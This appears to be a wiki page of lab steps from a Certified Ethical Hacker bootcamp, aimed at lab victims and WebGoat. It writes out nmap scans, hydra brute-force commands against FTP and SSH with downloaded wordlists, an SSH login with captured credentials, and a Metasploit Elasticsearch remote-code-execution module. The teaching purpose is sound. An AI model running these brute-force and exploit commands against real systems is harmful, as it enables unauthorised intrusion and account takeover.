-
Notifications
You must be signed in to change notification settings - Fork 53
LABS 4 day
Dean Bushmiller edited this page Jul 25, 2023
·
17 revisions
- See readme page of this github
- Open your mindmap for each section
- Start machines KALI, 2 Victims & Guacamole if on AWS
- If you are using Guac on AWS - the IP address may change & you will need to add security exception to browser
- Go to this page in Kali
- Open packet capture & txt files
- learning how to learn the basics: phases, tools, labs, and interacting with the instructor.
- Scope Phase 1
- Data collection from interview and live site (no scanning against live site)
- Details in class
- You may start as soon as you agree to terms in chat
- Document using your copy of https://docs.google.com/spreadsheets/d/1YprfmzROSUkqpAfGRdNfcSO8mM0FarOXRJ6gg8rVGdg/edit#gid=0
- You will use only a browser and the scope given in class
- In Kali if you can
- Footprinting is the ECC word for Scope of network reconnaissance
- Collect data from external sources
- Locate job listing details
- Locate User list, names, email
- Locate support page and links to support, follow links
- Collect default password possibles
- Test basic password recipes - DO NOT BRUTE FORCE (3 guesses max)
- Generate a password list + a user list = make txt files, install seclist
- Brute force ONLY using Instructor password list against 2 AWS host for each service in enumeration
- Capture new account logins and test standard interfaces
- Fingerprinting is the Nmap term for identification of the the O.S. and service version
-
Victim IP addresses: 10.0.0.10 & 10.0.0.21 (2)
-
Using Metasploit and Nmap together as a scanner
-
IN KALI
-
sudo -i -
@ root
-
msfconsole -
@ msf6>
-
color true -
db_nmap -sS -A 10.0.0.10-21 -
services -
Document
-
IN Artifact repository Manually (google sheet/ YOUR copy and paste)
-
Copy output to Vulnerabilities 1 tab (still unconfirmed)
-
https://docs.google.com/spreadsheets/d/1PMK589QX5tC9KAMsuoTnR2uVhEVh8830xJNC0N0zdyM/edit?usp=sharing
-
Reformat
-
IN KALI
-
@ msf6>
-
exit -
we know what services are running and where we can apply password brute force
-
!!!done!!!
- Load user list (you may have collected these - but this is a short cut) @ command line wget https://ceh-v11-20220609.s3.amazonaws.com/expsecusers.txt
- cat expsecusers.txt
- start with generic ( you will not use these list - because they take too much time out of class)
- IN KALI
- @ root
-
apt -y install seclists -
seclists -h
- https://www.kali.org/tools/seclists/
- Upload custom password list
- Shortcut: I put cleaned expsec user list on AWS S3
- ` Using wget & moving into correct directory
- IN KALI
- @ root
-
wget https://ceh-v11-20220609.s3.amazonaws.com/expsecusers.txt -
mv expsecusers.txt /usr/share/seclists/Usernames/ -
wget https://ceh-v11-20220609.s3.amazonaws.com/expsec-passwords.txt -
mv expsec-passwords.txt /usr/share/seclists/Passwords/ - !!!done!!!
- Using hydra
- From Scan: Port 21 & 22 are open on .10 & .21
- From seclist we have multiple list (one real short, one fake because the lab can't take 122 hrs)
- make 2 target lists by echoing data into a file
- IN KALI
- @ root
-
echo '10.0.0.10:21' >> targetsFTP.txt -
echo '10.0.0.21:21' >> targetsFTP.txt -
echo '10.0.0.10:22' >> targetsSSH.txt && echo '10.0.0.21:22' >> targetsSSH.txt - verify your file contents
-
cat targetsFTP.txt -
cat targetsSSH.txt - verify if you are in /usr/share/seclist (see 2 target files above)
-
ls - Use 1 famous list of passwords & a custom list
-
hydra -L ./Usernames/expsecusers.txt -P ./Passwords/xato-net-10-million-passwords-100.txt -M targetsFTP.txt ftp - How long does first take?
- what if this was 100,000 or more?
- You like watching paint dry?
- Use the custom list to speed this up
-
hydra -L ./Usernames/expsecusers.txt -P ./Passwords/expsec-passwords.txt -M targetsFTP.txt ftp -
hydra -L ./Usernames/expsecusers.txt -P ./Passwords/expsec-passwords.txt -M targetsSSH.txt ssh - Who do we get?
- Document
- IN Artifact repository Manually (google sheet/ your copy and paste)
- Copy output to Vulnerabilities 1 tab (still unconfirmed)
- Reformat
- !!!done!!!
DO NOT do SQL enumeration yet.
Document services from nmap
DNS enumeration dnsenum for expsec.us
SMB enumeration enum4linux for both .10 & .21
Identify other tools in KALI Applications vulnerabilities section that will help with the open services on these two machines.
- if you are new https://nmap.org/presentations/BHDC10/ watch
- research https://nmap.org/book/nse.html
- nmap -A -T4 10.0.0.10
- nmap -A -T4 10.0.0.21
- Review section HOST script results section
- do the manual process of research from step five for one service (you choose)
AFTER CLASS Install https://www.kali.org/tools/gvm/#openvas
- no help , no instructions
- Do a scan against both victims
- screenshot results and send to instructor email
Lots of adjustments made by you. https://www.tenable.com/try 7 day trial This link has a mix of instructions for virtual machines and metasploitable2 to that will work in some instances for metasploitable3 https://github.com/deanbushmiller/CEH-bootcamp/blob/master/4Day/The_Easiest_Metasploit_Guide_Youll_Ever.pdf
- must watch video after class
- send email to agree to terms
- We have SSH credentials so we can do anything. But we are not.
- Start a SSH instance and escalate priv.
- IN KALI
- @ root
-
ssh 10.0.0.21 -l boba_fett - Supply password from your Artifact's sheet
-
CTRL Z - You now have a remote shell on the windows victim ( it will NOT act like your Kali terminal)
- What you can do depends on administrator skills.
- Exploit port 9200
- IN KALI
- @ msf6>
- ? what services have we captured
-
services - ? use exploit (CVE-2014-3120)
- I am not giving you the settings for set ( you must think and apply what you have learned)
-
use exploit/multi/elasticsearch/script_mvel_rce -
set RHOST -
set LHOST -
set RPORT -
set LPORT 4444 - normally we set PAYLOAD but we are trying to verify exploit only
-
run - returned message: Exploit completed, but no session was created.
- https://www.tutorialspoint.com/metasploit/index.htm
- https://www.offensive-security.com/metasploit-unleashed/
- If you have vmware or virtualbox / you need space & RAM
- https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
- https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/
- just bettercap for hijacking
- https://doublepulsar.com/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6
- https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident#ssh
- Exploiting ManageEngine Desktop Central 9 and Apache Tomcat
- from https://github.com/deanbushmiller/CEH-bootcamp/blob/master/4Day/LAB-AFTER%20Class/Sharma-CEH-Lab-metaspl3.pdf
- page 4-8
- Recon original site expsec.us & against internal VICTIMS
- Using ssllabs.com or testssl.sh on kali https://www.kali.org/tools/testssl.sh/
- look up attacks - one hint POODLE (SSLv3) a client-side vulnerability
- exploit https://github.com/mpgn/poodle-PoC#3-the-poodle-exploitpy-file
- Build WebGoat & WebWolf ( as new version come out check /releases and adjust the command)
- ON Kali - open this page so that cut and paste is easy.
- it is unclear when the --fix-broken is necessary
- apt update
- apt --fix-broken install
- sudo apt-get install default-jre
- sudo apt-get install default-jdk
- apt --fix-broken install
- sudo update-alternatives --config java
- wget https://github.com/WebGoat/WebGoat/releases/download/v8.2.2/webgoat-server-8.2.2.jar
- wget https://github.com/WebGoat/WebGoat/releases/download/v8.2.2/webwolf-8.2.2.jar
- java -Dfile.encoding=UTF-8 -Dwebgoat.port=8080 -Dwebwolf.port=9090 -jar webgoat-server-8.2.2.jar
- http://localhost:8080/WebGoat/login
- Create a user kali123 / kali123
- The java command window must stay open to keep WebGoat running
- If you want to restart later, you were root, i.e. sudo -i, you can use history to recall the java command, & !## to execute it
- Read https://www.zaproxy.org/getting-started/
- Install ZAP
- sudo apt install zaproxy
- Configure
- Start zap
- No to persistent session
- Use port 8081
- close updates menu
- Read and do all of WebGoat
- Problems?
- look here https://github.com/WebGoat/WebGoat/wiki/(Almost)-Fully-Documented-Solution-(en)#introduction
- watch here https://www.youtube.com/watch?v=eWubcGPN_28
- OWASP top 10 https://owasp.org/www-project-top-ten/
- CAPEC version of OWASP attacks https://capec.mitre.org/data/definitions/659.html
- Zoom in https://owasp.org/www-community/attacks/csrf & https://capec.mitre.org/data/definitions/62.html
- Testing for one https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/06-Session_Management_Testing/05-Testing_for_Cross_Site_Request_Forgery
- Do your own https://code.google.com/archive/p/pinata-csrf-tool/
- lab2.task4 PROCESS Reconn = wordpress site | Vuln research & Exploit build tool = use wpscan | Convince Admin to click file.
- research destination https://packetstormsecurity.com/files/136735/
- 15 there is one SQLi lab in WEbGoat
- Option 1 Requires no setup, but you must register free https://portswigger.net/users
- look first ? https://portswigger.net/web-security/sql-injection
- Option 2 solo lab on own setup
- You want more SQL injection? - I defer to Raj Chandel
- https://www.hackingarticles.in/set-sqli-lab-kali/
- this like webgoat for SQLi
- https://github.com/rapid7/metasploitable3/wiki/Vulnerabilities
- Use these hints to process and document each vuln in your sheet and submit to the instructor.
- step by step other metasploitable3
https://www.thomaslaurenson.com/tags/metasploitable-3/ https://finnlestrange.tech/windows/Metasploitable-3-Walkthrough/ https://www.hackingarticles.in/?s=Metasploitable+3